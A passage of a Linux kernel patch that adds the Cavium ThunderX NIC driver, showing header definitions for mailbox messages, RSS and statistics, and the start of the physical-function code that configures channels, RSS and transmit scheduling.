NIC_MAX_PKIND 16 + +/* Rx Channels */ +/* Receive channel configuration in TNS bypass mode + * Below is configuration in TNS bypass mode + * BGX0-LMAC0-CHAN0 - VNIC CHAN0 + * BGX0-LMAC1-CHAN0 - VNIC CHAN16 + * ... + * BGX1-LMAC0-CHAN0 - VNIC CHAN128 + * ... + * BGX1-LMAC3-CHAN0 - VNIC CHAN174 + */ +#define NIC_INTF_COUNT 2 /* Interfaces btw VNIC and TNS/BGX */ +#define NIC_CHANS_PER_INF 128 +#define NIC_MAX_CHANS (NIC_INTF_COUNT * NIC_CHANS_PER_INF) +#define NIC_CPI_COUNT 2048 /* No of channel parse indices */ + +/* TNS bypass mode: 1-1 mapping between VNIC and BGX:LMAC */ +#define NIC_MAX_BGX MAX_BGX_PER_CN88XX +#define NIC_CPI_PER_BGX (NIC_CPI_COUNT / NIC_MAX_BGX) +#define NIC_MAX_CPI_PER_LMAC 64 /* Max when CPI_ALG is IP diffserv */ +#define NIC_RSSI_PER_BGX (NIC_RSSI_COUNT / NIC_MAX_BGX) + +/* Tx scheduling */ +#define NIC_MAX_TL4 1024 +#define NIC_MAX_TL4_SHAPERS 256 /* 1 shaper for 4 TL4s */ +#define NIC_MAX_TL3 256 +#define NIC_MAX_TL3_SHAPERS 64 /* 1 shaper for 4 TL3s */ +#define NIC_MAX_TL2 64 +#define NIC_MAX_TL2_SHAPERS 2 /* 1 shaper for 32 TL2s */ +#define NIC_MAX_TL1 2 + +/* TNS bypass mode */ +#define NIC_TL2_PER_BGX 32 +#define NIC_TL4_PER_BGX (NIC_MAX_TL4 / NIC_MAX_BGX) +#define NIC_TL4_PER_LMAC (NIC_MAX_TL4 / NIC_CHANS_PER_INF) + +/* NIC VF Interrupts */ +#define NICVF_INTR_CQ 0 +#define NICVF_INTR_SQ 1 +#define NICVF_INTR_RBDR 2 +#define NICVF_INTR_PKT_DROP 3 +#define NICVF_INTR_TCP_TIMER 4 +#define NICVF_INTR_MBOX 5 +#define NICVF_INTR_QS_ERR 6 + +#define NICVF_INTR_CQ_SHIFT 0 +#define NICVF_INTR_SQ_SHIFT 8 +#define NICVF_INTR_RBDR_SHIFT 16 +#define NICVF_INTR_PKT_DROP_SHIFT 20 +#define NICVF_INTR_TCP_TIMER_SHIFT 21 +#define NICVF_INTR_MBOX_SHIFT 22 +#define NICVF_INTR_QS_ERR_SHIFT 23 + +#define NICVF_INTR_CQ_MASK (0xFF << NICVF_INTR_CQ_SHIFT) +#define NICVF_INTR_SQ_MASK (0xFF << NICVF_INTR_SQ_SHIFT) +#define NICVF_INTR_RBDR_MASK (0x03 << NICVF_INTR_RBDR_SHIFT) +#define NICVF_INTR_PKT_DROP_MASK BIT(NICVF_INTR_PKT_DROP_SHIFT) +#define NICVF_INTR_TCP_TIMER_MASK BIT(NICVF_INTR_TCP_TIMER_SHIFT) +#define NICVF_INTR_MBOX_MASK BIT(NICVF_INTR_MBOX_SHIFT) +#define NICVF_INTR_QS_ERR_MASK BIT(NICVF_INTR_QS_ERR_SHIFT) + +/* MSI-X interrupts */ +#define NIC_PF_MSIX_VECTORS 10 +#define NIC_VF_MSIX_VECTORS 20 + +#define NIC_PF_INTR_ID_ECC0_SBE 0 +#define NIC_PF_INTR_ID_ECC0_DBE 1 +#define NIC_PF_INTR_ID_ECC1_SBE 2 +#define NIC_PF_INTR_ID_ECC1_DBE 3 +#define NIC_PF_INTR_ID_ECC2_SBE 4 +#define NIC_PF_INTR_ID_ECC2_DBE 5 +#define NIC_PF_INTR_ID_ECC3_SBE 6 +#define NIC_PF_INTR_ID_ECC3_DBE 7 +#define NIC_PF_INTR_ID_MBOX0 8 +#define NIC_PF_INTR_ID_MBOX1 9 + +/* Global timer for CQ timer thresh interrupts + * Calculated for SCLK of 700Mhz + * value written should be a 1/16th of what is expected + * + * 1 tick per 0.05usec = value of 2.2 + * This 10% would be covered in CQ timer thresh value + */ +#define NICPF_CLK_PER_INT_TICK 2 + +struct nicvf_cq_poll { + u8 cq_idx; /* Completion queue index */ + struct napi_struct napi; +}; + +#define NIC_RSSI_COUNT 4096 /* Total no of RSS indices */ +#define NIC_MAX_RSS_HASH_BITS 8 +#define NIC_MAX_RSS_IDR_TBL_SIZE (1 << NIC_MAX_RSS_HASH_BITS) +#define RSS_HASH_KEY_SIZE 5 /* 320 bit key */ + +struct nicvf_rss_info { + bool enable; +#define RSS_L2_EXTENDED_HASH_ENA BIT(0) +#define RSS_IP_HASH_ENA BIT(1) +#define RSS_TCP_HASH_ENA BIT(2) +#define RSS_TCP_SYN_DIS BIT(3) +#define RSS_UDP_HASH_ENA BIT(4) +#define RSS_L4_EXTENDED_HASH_ENA BIT(5) +#define RSS_ROCE_ENA BIT(6) +#define RSS_L3_BI_DIRECTION_ENA BIT(7) +#define RSS_L4_BI_DIRECTION_ENA BIT(8) + u64 cfg; + u8 hash_bits; + u16 rss_size; + u8 ind_tbl[NIC_MAX_RSS_IDR_TBL_SIZE]; + u64 key[RSS_HASH_KEY_SIZE]; +} ____cacheline_aligned_in_smp; + +enum rx_stats_reg_offset { + RX_OCTS = 0x0, + RX_UCAST = 0x1, + RX_BCAST = 0x2, + RX_MCAST = 0x3, + RX_RED = 0x4, + RX_RED_OCTS = 0x5, + RX_ORUN = 0x6, + RX_ORUN_OCTS = 0x7, + RX_FCS = 0x8, + RX_L2ERR = 0x9, + RX_DRP_BCAST = 0xa, + RX_DRP_MCAST = 0xb, + RX_DRP_L3BCAST = 0xc, + RX_DRP_L3MCAST = 0xd, + RX_STATS_ENUM_LAST, +}; + +enum tx_stats_reg_offset { + TX_OCTS = 0x0, + TX_UCAST = 0x1, + TX_BCAST = 0x2, + TX_MCAST = 0x3, + TX_DROP = 0x4, + TX_STATS_ENUM_LAST, +}; + +struct nicvf_hw_stats { + u64 rx_bytes_ok; + u64 rx_ucast_frames_ok; + u64 rx_bcast_frames_ok; + u64 rx_mcast_frames_ok; + u64 rx_fcs_errors; + u64 rx_l2_errors; + u64 rx_drop_red; + u64 rx_drop_red_bytes; + u64 rx_drop_overrun; + u64 rx_drop_overrun_bytes; + u64 rx_drop_bcast; + u64 rx_drop_mcast; + u64 rx_drop_l3_bcast; + u64 rx_drop_l3_mcast; + u64 tx_bytes_ok; + u64 tx_ucast_frames_ok; + u64 tx_bcast_frames_ok; + u64 tx_mcast_frames_ok; + u64 tx_drops; +}; + +struct nicvf_drv_stats { + /* Rx */ + u64 rx_frames_ok; + u64 rx_frames_64; + u64 rx_frames_127; + u64 rx_frames_255; + u64 rx_frames_511; + u64 rx_frames_1023; + u64 rx_frames_1518; + u64 rx_frames_jumbo; + u64 rx_drops; + /* Tx */ + u64 tx_frames_ok; + u64 tx_drops; + u64 tx_busy; + u64 tx_tso; +}; + +struct nicvf { + struct net_device *netdev; + struct pci_dev *pdev; + u8 vf_id; + u8 node; + u8 tns_mode; + u16 mtu; + struct queue_set *qs; + void __iomem *reg_base; + bool link_up; + u8 duplex; + u32 speed; + struct page *rb_page; + u32 rb_page_offset; + bool rb_alloc_fail; + bool rb_work_scheduled; + struct delayed_work rbdr_work; + struct tasklet_struct rbdr_task; + struct tasklet_struct qs_err_task; + struct tasklet_struct cq_task; + struct nicvf_cq_poll *napi[8]; + struct nicvf_rss_info rss_info; + u8 cpi_alg; + /* Interrupt coalescing settings */ + u32 cq_coalesce_usecs; + + u32 msg_enable; + struct nicvf_hw_stats stats; + struct nicvf_drv_stats drv_stats; + struct bgx_stats bgx_stats; + struct work_struct reset_task; + + /* MSI-X */ + bool msix_enabled; + u8 num_vec; + struct msix_entry msix_entries[NIC_VF_MSIX_VECTORS]; + char irq_name[NIC_VF_MSIX_VECTORS][20]; + bool irq_allocated[NIC_VF_MSIX_VECTORS]; + + bool pf_ready_to_rcv_msg; + bool pf_acked; + bool pf_nacked; + bool bgx_stats_acked; +} ____cacheline_aligned_in_smp; + +/* PF <--> VF Mailbox communication + * Eight 64bit registers are shared between PF and VF. + * Separate set for each VF. + * Writing '1' into last register mbx7 means end of message. + */ + +/* PF <--> VF mailbox communication */ +#define NIC_PF_VF_MAILBOX_SIZE 2 +#define NIC_MBOX_MSG_TIMEOUT 2000 /* ms */ + +/* Mailbox message types */ +#define NIC_MBOX_MSG_READY 0x01 /* Is PF ready to rcv msgs */ +#define NIC_MBOX_MSG_ACK 0x02 /* ACK the message received */ +#define NIC_MBOX_MSG_NACK 0x03 /* NACK the message received */ +#define NIC_MBOX_MSG_QS_CFG 0x04 /* Configure Qset */ +#define NIC_MBOX_MSG_RQ_CFG 0x05 /* Configure receive queue */ +#define NIC_MBOX_MSG_SQ_CFG 0x06 /* Configure Send queue */ +#define NIC_MBOX_MSG_RQ_DROP_CFG 0x07 /* Configure receive queue */ +#define NIC_MBOX_MSG_SET_MAC 0x08 /* Add MAC ID to DMAC filter */ +#define NIC_MBOX_MSG_SET_MAX_FRS 0x09 /* Set max frame size */ +#define NIC_MBOX_MSG_CPI_CFG 0x0A /* Config CPI, RSSI */ +#define NIC_MBOX_MSG_RSS_SIZE 0x0B /* Get RSS indir_tbl size */ +#define NIC_MBOX_MSG_RSS_CFG 0x0C /* Config RSS table */ +#define NIC_MBOX_MSG_RSS_CFG_CONT 0x0D /* RSS config continuation */ +#define NIC_MBOX_MSG_RQ_BP_CFG 0x0E /* RQ backpressure config */ +#define NIC_MBOX_MSG_RQ_SW_SYNC 0x0F /* Flush inflight pkts to RQ */ +#define NIC_MBOX_MSG_BGX_STATS 0x10 /* Get stats from BGX */ +#define NIC_MBOX_MSG_BGX_LINK_CHANGE 0x11 /* BGX:LMAC link status */ +#define NIC_MBOX_MSG_CFG_DONE 0x12 /* VF configuration done */ +#define NIC_MBOX_MSG_SHUTDOWN 0x13 /* VF is being shutdown */ + +struct nic_cfg_msg { + u8 msg; + u8 vf_id; + u8 tns_mode; + u8 node_id; + u64 mac_addr; +}; + +/* Qset configuration */ +struct qs_cfg_msg { + u8 msg; + u8 num; + u64 cfg; +}; + +/* Receive queue configuration */ +struct rq_cfg_msg { + u8 msg; + u8 qs_num; + u8 rq_num; + u64 cfg; +}; + +/* Send queue configuration */ +struct sq_cfg_msg { + u8 msg; + u8 qs_num; + u8 sq_num; + u64 cfg; +}; + +/* Set VF's MAC address */ +struct set_mac_msg { + u8 msg; + u8 vf_id; + u64 addr; +}; + +/* Set Maximum frame size */ +struct set_frs_msg { + u8 msg; + u8 vf_id; + u16 max_frs; +}; + +/* Set CPI algorithm type */ +struct cpi_cfg_msg { + u8 msg; + u8 vf_id; + u8 rq_cnt; + u8 cpi_alg; +}; + +/* Get RSS table size */ +struct rss_sz_msg { + u8 msg; + u8 vf_id; + u16 ind_tbl_size; +}; + +/* Set RSS configuration */ +struct rss_cfg_msg { + u8 msg; + u8 vf_id; + u8 hash_bits; + u8 tbl_len; + u8 tbl_offset; +#define RSS_IND_TBL_LEN_PER_MBX_MSG 8 + u8 ind_tbl[RSS_IND_TBL_LEN_PER_MBX_MSG]; +}; + +struct bgx_stats_msg { + u8 msg; + u8 vf_id; + u8 rx; + u8 idx; + u64 stats; +}; + +/* Physical interface link status */ +struct bgx_link_status { + u8 msg; + u8 link_up; + u8 duplex; + u32 speed; +}; + +/* 128 bit shared memory between PF and each VF */ +union nic_mbx { + struct { u8 msg; } msg; + struct nic_cfg_msg nic_cfg; + struct qs_cfg_msg qs; + struct rq_cfg_msg rq; + struct sq_cfg_msg sq; + struct set_mac_msg mac; + struct set_frs_msg frs; + struct cpi_cfg_msg cpi_cfg; + struct rss_sz_msg rss_size; + struct rss_cfg_msg rss_cfg; + struct bgx_stats_msg bgx_stats; + struct bgx_link_status link_status; +}; + +int nicvf_set_real_num_queues(struct net_device *netdev, + int tx_queues, int rx_queues); +int nicvf_open(struct net_device *netdev); +int nicvf_stop(struct net_device *netdev); +int nicvf_send_msg_to_pf(struct nicvf *vf, union nic_mbx *mbx); +void nicvf_config_cpi(struct nicvf *nic); +void nicvf_config_rss(struct nicvf *nic); +void nicvf_set_rss_key(struct nicvf *nic); +void nicvf_free_skb(struct nicvf *nic, struct sk_buff *skb); +void nicvf_set_ethtool_ops(struct net_device *netdev); +void nicvf_update_stats(struct nicvf *nic); +void nicvf_update_lmac_stats(struct nicvf *nic); + +#endif /* NIC_H */ diff --git a/drivers/net/ethernet/cavium/thunder/nic_main.c b/drivers/net/ethernet/cavium/thunder/nic_main.c new file mode 100644 index 000000000000..0f1f58b54bf1 --- /dev/null +++ b/drivers/net/ethernet/cavium/thunder/nic_main.c @@ -0,0 +1,940 @@ +/* + * Copyright (C) 2015 Cavium, Inc. + * + * This program is free software; you can redistribute it and/or modify it + * under the terms of version 2 of the GNU General Public License + * as published by the Free Software Foundation. + */ + +#include +#include +#include +#include +#include + +#include "nic_reg.h" +#include "nic.h" +#include "q_struct.h" +#include "thunder_bgx.h" + +#define DRV_NAME "thunder-nic" +#define DRV_VERSION "1.0" + +struct nicpf { + struct pci_dev *pdev; + u8 rev_id; +#define NIC_NODE_ID_MASK 0x300000000000 +#define NIC_NODE_ID(x) ((x & NODE_ID_MASK) >> 44) + u8 node; + unsigned int flags; + u8 num_vf_en; /* No of VF enabled */ + bool vf_enabled[MAX_NUM_VFS_SUPPORTED]; + void __iomem *reg_base; /* Register start address */ + struct pkind_cfg pkind; +#define NIC_SET_VF_LMAC_MAP(bgx, lmac) (((bgx & 0xF) << 4) | (lmac & 0xF)) +#define NIC_GET_BGX_FROM_VF_LMAC_MAP(map) ((map >> 4) & 0xF) +#define NIC_GET_LMAC_FROM_VF_LMAC_MAP(map) (map & 0xF) + u8 vf_lmac_map[MAX_LMAC]; + struct delayed_work dwork; + struct workqueue_struct *check_link; + u8 link[MAX_LMAC]; + u8 duplex[MAX_LMAC]; + u32 speed[MAX_LMAC]; + u16 cpi_base[MAX_NUM_VFS_SUPPORTED]; + u16 rss_ind_tbl_size; + bool mbx_lock[MAX_NUM_VFS_SUPPORTED]; + + /* MSI-X */ + bool msix_enabled; + u8 num_vec; + struct msix_entry msix_entries[NIC_PF_MSIX_VECTORS]; + bool irq_allocated[NIC_PF_MSIX_VECTORS]; +}; + +/* Supported devices */ +static const struct pci_device_id nic_id_table[] = { + { PCI_DEVICE(PCI_VENDOR_ID_CAVIUM, PCI_DEVICE_ID_THUNDER_NIC_PF) }, + { 0, } /* end of table */ +}; + +MODULE_AUTHOR("Sunil Goutham"); +MODULE_DESCRIPTION("Cavium Thunder NIC Physical Function Driver"); +MODULE_LICENSE("GPL v2"); +MODULE_VERSION(DRV_VERSION); +MODULE_DEVICE_TABLE(pci, nic_id_table); + +/* The Cavium ThunderX network controller can *only* be found in SoCs + * containing the ThunderX ARM64 CPU implementation. All accesses to the device + * registers on this platform are implicitly strongly ordered with respect + * to memory accesses. So writeq_relaxed() and readq_relaxed() are safe to use + * with no memory barriers in this driver. The readq()/writeq() functions add + * explicit ordering operation which in this case are redundant, and only + * add overhead. + */ + +/* Register read/write APIs */ +static void nic_reg_write(struct nicpf *nic, u64 offset, u64 val) +{ + writeq_relaxed(val, nic->reg_base + offset); +} + +static u64 nic_reg_read(struct nicpf *nic, u64 offset) +{ + return readq_relaxed(nic->reg_base + offset); +} + +/* PF -> VF mailbox communication APIs */ +static void nic_enable_mbx_intr(struct nicpf *nic) +{ + /* Enable mailbox interrupt for all 128 VFs */ + nic_reg_write(nic, NIC_PF_MAILBOX_ENA_W1S, ~0ull); + nic_reg_write(nic, NIC_PF_MAILBOX_ENA_W1S + sizeof(u64), ~0ull); +} + +static void nic_clear_mbx_intr(struct nicpf *nic, int vf, int mbx_reg) +{ + nic_reg_write(nic, NIC_PF_MAILBOX_INT + (mbx_reg << 3), BIT_ULL(vf)); +} + +static u64 nic_get_mbx_addr(int vf) +{ + return NIC_PF_VF_0_127_MAILBOX_0_1 + (vf << NIC_VF_NUM_SHIFT); +} + +/* Send a mailbox message to VF + * @vf: vf to which this message to be sent + * @mbx: Message to be sent + */ +static void nic_send_msg_to_vf(struct nicpf *nic, int vf, union nic_mbx *mbx) +{ + void __iomem *mbx_addr = nic->reg_base + nic_get_mbx_addr(vf); + u64 *msg = (u64 *)mbx; + + /* In first revision HW, mbox interrupt is triggerred + * when PF writes to MBOX(1), in next revisions when + * PF writes to MBOX(0) + */ + if (nic->rev_id == 0) { + /* see the comment for nic_reg_write()/nic_reg_read() + * functions above + */ + writeq_relaxed(msg[0], mbx_addr); + writeq_relaxed(msg[1], mbx_addr + 8); + } else { + writeq_relaxed(msg[1], mbx_addr + 8); + writeq_relaxed(msg[0], mbx_addr); + } +} + +/* Responds to VF's READY message with VF's + * ID, node, MAC address e.t.c + * @vf: VF which sent READY message + */ +static void nic_mbx_send_ready(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + int bgx_idx, lmac; + const char *mac; + + mbx.nic_cfg.msg = NIC_MBOX_MSG_READY; + mbx.nic_cfg.vf_id = vf; + + mbx.nic_cfg.tns_mode = NIC_TNS_BYPASS_MODE; + + bgx_idx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vf]); + + mac = bgx_get_lmac_mac(nic->node, bgx_idx, lmac); + if (mac) + ether_addr_copy((u8 *)&mbx.nic_cfg.mac_addr, mac); + + mbx.nic_cfg.node_id = nic->node; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* ACKs VF's mailbox message + * @vf: VF to which ACK to be sent + */ +static void nic_mbx_send_ack(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_ACK; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* NACKs VF's mailbox message that PF is not able to + * complete the action + * @vf: VF to which ACK to be sent + */ +static void nic_mbx_send_nack(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + + mbx.msg.msg = NIC_MBOX_MSG_NACK; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* Flush all in flight receive packets to memory and + * bring down an active RQ + */ +static int nic_rcv_queue_sw_sync(struct nicpf *nic) +{ + u16 timeout = ~0x00; + + nic_reg_write(nic, NIC_PF_SW_SYNC_RX, 0x01); + /* Wait till sync cycle is finished */ + while (timeout) { + if (nic_reg_read(nic, NIC_PF_SW_SYNC_RX_DONE) & 0x1) + break; + timeout--; + } + nic_reg_write(nic, NIC_PF_SW_SYNC_RX, 0x00); + if (!timeout) { + dev_err(&nic->pdev->dev, "Receive queue software sync failed"); + return 1; + } + return 0; +} + +/* Get BGX Rx/Tx stats and respond to VF's request */ +static void nic_get_bgx_stats(struct nicpf *nic, struct bgx_stats_msg *bgx) +{ + int bgx_idx, lmac; + union nic_mbx mbx = {}; + + bgx_idx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[bgx->vf_id]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[bgx->vf_id]); + + mbx.bgx_stats.msg = NIC_MBOX_MSG_BGX_STATS; + mbx.bgx_stats.vf_id = bgx->vf_id; + mbx.bgx_stats.rx = bgx->rx; + mbx.bgx_stats.idx = bgx->idx; + if (bgx->rx) + mbx.bgx_stats.stats = bgx_get_rx_stats(nic->node, bgx_idx, + lmac, bgx->idx); + else + mbx.bgx_stats.stats = bgx_get_tx_stats(nic->node, bgx_idx, + lmac, bgx->idx); + nic_send_msg_to_vf(nic, bgx->vf_id, &mbx); +} + +/* Update hardware min/max frame size */ +static int nic_update_hw_frs(struct nicpf *nic, int new_frs, int vf) +{ + if ((new_frs > NIC_HW_MAX_FRS) || (new_frs < NIC_HW_MIN_FRS)) { + dev_err(&nic->pdev->dev, + "Invalid MTU setting from VF%d rejected, should be between %d and %d\n", + vf, NIC_HW_MIN_FRS, NIC_HW_MAX_FRS); + return 1; + } + new_frs += ETH_HLEN; + if (new_frs <= nic->pkind.maxlen) + return 0; + + nic->pkind.maxlen = new_frs; + nic_reg_write(nic, NIC_PF_PKIND_0_15_CFG, *(u64 *)&nic->pkind); + return 0; +} + +/* Set minimum transmit packet size */ +static void nic_set_tx_pkt_pad(struct nicpf *nic, int size) +{ + int lmac; + u64 lmac_cfg; + + /* Max value that can be set is 60 */ + if (size > 60) + size = 60; + + for (lmac = 0; lmac < (MAX_BGX_PER_CN88XX * MAX_LMAC_PER_BGX); lmac++) { + lmac_cfg = nic_reg_read(nic, NIC_PF_LMAC_0_7_CFG | (lmac << 3)); + lmac_cfg &= ~(0xF << 2); + lmac_cfg |= ((size / 4) << 2); + nic_reg_write(nic, NIC_PF_LMAC_0_7_CFG | (lmac << 3), lmac_cfg); + } +} + +/* Function to check number of LMACs present and set VF::LMAC mapping. + * Mapping will be used while initializing channels. + */ +static void nic_set_lmac_vf_mapping(struct nicpf *nic) +{ + unsigned bgx_map = bgx_get_map(nic->node); + int bgx, next_bgx_lmac = 0; + int lmac, lmac_cnt = 0; + u64 lmac_credit; + + nic->num_vf_en = 0; + + for (bgx = 0; bgx < NIC_MAX_BGX; bgx++) { + if (!(bgx_map & (1 << bgx))) + continue; + lmac_cnt = bgx_get_lmac_count(nic->node, bgx); + for (lmac = 0; lmac < lmac_cnt; lmac++) + nic->vf_lmac_map[next_bgx_lmac++] = + NIC_SET_VF_LMAC_MAP(bgx, lmac); + nic->num_vf_en += lmac_cnt; + + /* Program LMAC credits */ + lmac_credit = (1ull << 1); /* channel credit enable */ + lmac_credit |= (0x1ff << 2); /* Max outstanding pkt count */ + /* 48KB BGX Tx buffer size, each unit is of size 16bytes */ + lmac_credit |= (((((48 * 1024) / lmac_cnt) - + NIC_HW_MAX_FRS) / 16) << 12); + lmac = bgx * MAX_LMAC_PER_BGX; + for (; lmac < lmac_cnt + (bgx * MAX_LMAC_PER_BGX); lmac++) + nic_reg_write(nic, + NIC_PF_LMAC_0_7_CREDIT + (lmac * 8), + lmac_credit); + } +} + +#define BGX0_BLOCK 8 +#define BGX1_BLOCK 9 + +static void nic_init_hw(struct nicpf *nic) +{ + int i; + + /* Reset NIC, in case the driver is repeatedly inserted and removed */ + nic_reg_write(nic, NIC_PF_SOFT_RESET, 1); + + /* Enable NIC HW block */ + nic_reg_write(nic, NIC_PF_CFG, 0x3); + + /* Enable backpressure */ + nic_reg_write(nic, NIC_PF_BP_CFG, (1ULL << 6) | 0x03); + + /* Disable TNS mode on both interfaces */ + nic_reg_write(nic, NIC_PF_INTF_0_1_SEND_CFG, + (NIC_TNS_BYPASS_MODE << 7) | BGX0_BLOCK); + nic_reg_write(nic, NIC_PF_INTF_0_1_SEND_CFG | (1 << 8), + (NIC_TNS_BYPASS_MODE << 7) | BGX1_BLOCK); + nic_reg_write(nic, NIC_PF_INTF_0_1_BP_CFG, + (1ULL << 63) | BGX0_BLOCK); + nic_reg_write(nic, NIC_PF_INTF_0_1_BP_CFG + (1 << 8), + (1ULL << 63) | BGX1_BLOCK); + + /* PKIND configuration */ + nic->pkind.minlen = 0; + nic->pkind.maxlen = NIC_HW_MAX_FRS + ETH_HLEN; + nic->pkind.lenerr_en = 1; + nic->pkind.rx_hdr = 0; + nic->pkind.hdr_sl = 0; + + for (i = 0; i < NIC_MAX_PKIND; i++) + nic_reg_write(nic, NIC_PF_PKIND_0_15_CFG | (i << 3), + *(u64 *)&nic->pkind); + + nic_set_tx_pkt_pad(nic, NIC_HW_MIN_FRS); + + /* Timer config */ + nic_reg_write(nic, NIC_PF_INTR_TIMER_CFG, NICPF_CLK_PER_INT_TICK); +} + +/* Channel parse index configuration */ +static void nic_config_cpi(struct nicpf *nic, struct cpi_cfg_msg *cfg) +{ + u32 vnic, bgx, lmac, chan; + u32 padd, cpi_count = 0; + u64 cpi_base, cpi, rssi_base, rssi; + u8 qset, rq_idx = 0; + + vnic = cfg->vf_id; + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + + chan = (lmac * MAX_BGX_CHANS_PER_LMAC) + (bgx * NIC_CHANS_PER_INF); + cpi_base = (lmac * NIC_MAX_CPI_PER_LMAC) + (bgx * NIC_CPI_PER_BGX); + rssi_base = (lmac * nic->rss_ind_tbl_size) + (bgx * NIC_RSSI_PER_BGX); + + /* Rx channel configuration */ + nic_reg_write(nic, NIC_PF_CHAN_0_255_RX_BP_CFG | (chan << 3), + (1ull << 63) | (vnic << 0)); + nic_reg_write(nic, NIC_PF_CHAN_0_255_RX_CFG | (chan << 3), + ((u64)cfg->cpi_alg << 62) | (cpi_base << 48)); + + if (cfg->cpi_alg == CPI_ALG_NONE) + cpi_count = 1; + else if (cfg->cpi_alg == CPI_ALG_VLAN) /* 3 bits of PCP */ + cpi_count = 8; + else if (cfg->cpi_alg == CPI_ALG_VLAN16) /* 3 bits PCP + DEI */ + cpi_count = 16; + else if (cfg->cpi_alg == CPI_ALG_DIFF) /* 6bits DSCP */ + cpi_count = NIC_MAX_CPI_PER_LMAC; + + /* RSS Qset, Qidx mapping */ + qset = cfg->vf_id; + rssi = rssi_base; + for (; rssi < (rssi_base + cfg->rq_cnt); rssi++) { + nic_reg_write(nic, NIC_PF_RSSI_0_4097_RQ | (rssi << 3), + (qset << 3) | rq_idx); + rq_idx++; + } + + rssi = 0; + cpi = cpi_base; + for (; cpi < (cpi_base + cpi_count); cpi++) { + /* Determine port to channel adder */ + if (cfg->cpi_alg != CPI_ALG_DIFF) + padd = cpi % cpi_count; + else + padd = cpi % 8; /* 3 bits CS out of 6bits DSCP */ + + /* Leave RSS_SIZE as '0' to disable RSS */ + nic_reg_write(nic, NIC_PF_CPI_0_2047_CFG | (cpi << 3), + (vnic << 24) | (padd << 16) | (rssi_base + rssi)); + + if ((rssi + 1) >= cfg->rq_cnt) + continue; + + if (cfg->cpi_alg == CPI_ALG_VLAN) + rssi++; + else if (cfg->cpi_alg == CPI_ALG_VLAN16) + rssi = ((cpi - cpi_base) & 0xe) >> 1; + else if (cfg->cpi_alg == CPI_ALG_DIFF) + rssi = ((cpi - cpi_base) & 0x38) >> 3; + } + nic->cpi_base[cfg->vf_id] = cpi_base; +} + +/* Responsds to VF with its RSS indirection table size */ +static void nic_send_rss_size(struct nicpf *nic, int vf) +{ + union nic_mbx mbx = {}; + u64 *msg; + + msg = (u64 *)&mbx; + + mbx.rss_size.msg = NIC_MBOX_MSG_RSS_SIZE; + mbx.rss_size.ind_tbl_size = nic->rss_ind_tbl_size; + nic_send_msg_to_vf(nic, vf, &mbx); +} + +/* Receive side scaling configuration + * configure: + * - RSS index + * - indir table i.e hash::RQ mapping + * - no of hash bits to consider + */ +static void nic_config_rss(struct nicpf *nic, struct rss_cfg_msg *cfg) +{ + u8 qset, idx = 0; + u64 cpi_cfg, cpi_base, rssi_base, rssi; + + cpi_base = nic->cpi_base[cfg->vf_id]; + cpi_cfg = nic_reg_read(nic, NIC_PF_CPI_0_2047_CFG | (cpi_base << 3)); + rssi_base = (cpi_cfg & 0x0FFF) + cfg->tbl_offset; + + rssi = rssi_base; + qset = cfg->vf_id; + + for (; rssi < (rssi_base + cfg->tbl_len); rssi++) { + nic_reg_write(nic, NIC_PF_RSSI_0_4097_RQ | (rssi << 3), + (qset << 3) | (cfg->ind_tbl[idx] & 0x7)); + idx++; + } + + cpi_cfg &= ~(0xFULL << 20); + cpi_cfg |= (cfg->hash_bits << 20); + nic_reg_write(nic, NIC_PF_CPI_0_2047_CFG | (cpi_base << 3), cpi_cfg); +} + +/* 4 level transmit side scheduler configutation + * for TNS bypass mode + * + * Sample configuration for SQ0 + * VNIC0-SQ0 -> TL4(0) -> TL3[0] -> TL2[0] -> TL1[0] -> BGX0 + * VNIC1-SQ0 -> TL4(8) -> TL3[2] -> TL2[0] -> TL1[0] -> BGX0 + * VNIC2-SQ0 -> TL4(16) -> TL3[4] -> TL2[1] -> TL1[0] -> BGX0 + * VNIC3-SQ0 -> TL4(24) -> TL3[6] -> TL2[1] -> TL1[0] -> BGX0 + * VNIC4-SQ0 -> TL4(512) -> TL3[128] -> TL2[32] -> TL1[1] -> BGX1 + * VNIC5-SQ0 -> TL4(520) -> TL3[130] -> TL2[32] -> TL1[1] -> BGX1 + * VNIC6-SQ0 -> TL4(528) -> TL3[132] -> TL2[33] -> TL1[1] -> BGX1 + * VNIC7-SQ0 -> TL4(536) -> TL3[134] -> TL2[33] -> TL1[1] -> BGX1 + */ +static void nic_tx_channel_cfg(struct nicpf *nic, u8 vnic, u8 sq_idx) +{ + u32 bgx, lmac, chan; + u32 tl2, tl3, tl4; + u32 rr_quantum; + + bgx = NIC_GET_BGX_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + lmac = NIC_GET_LMAC_FROM_VF_LMAC_MAP(nic->vf_lmac_map[vnic]); + /* 24 bytes for FCS, IPG and preamble */ + rr_quantum = ((NIC_HW_MAX_FRS + 24) / 4); + + tl4 = (lmac * NIC_TL4_PER_LMAC) + (bgx * NIC_TL4_PER_BGX); + tl4 += sq_idx; + tl3 = tl4 / (NIC_MAX_TL4 / NIC_MAX_TL3); + nic_reg_write(nic, NIC_PF_QSET_0_127_SQ_0_7_CFG2 | + ((u64)vnic << NIC_QS_ID_SHIFT) | + ((u32)sq_idx << NIC_Q_NUM_SHIFT), tl4); + nic_reg_write(nic, NIC_PF_TL4_0_1023_CFG | (tl4 << 3), + ((u64)vnic << 27) | ((u32)sq_idx << 24) | rr_quantum); + + nic_reg_write(nic, NIC_PF_TL3_0_255_CFG | (tl3 << 3), rr_quantum); + chan = (lmac * MAX_BGX_CHANS_PER_LMAC) + (bgx * NIC_CHANS_PER_INF); + nic_reg_write(nic, NIC_PF_TL3_0_255_CHAN | (tl3 << 3), chan); + /* 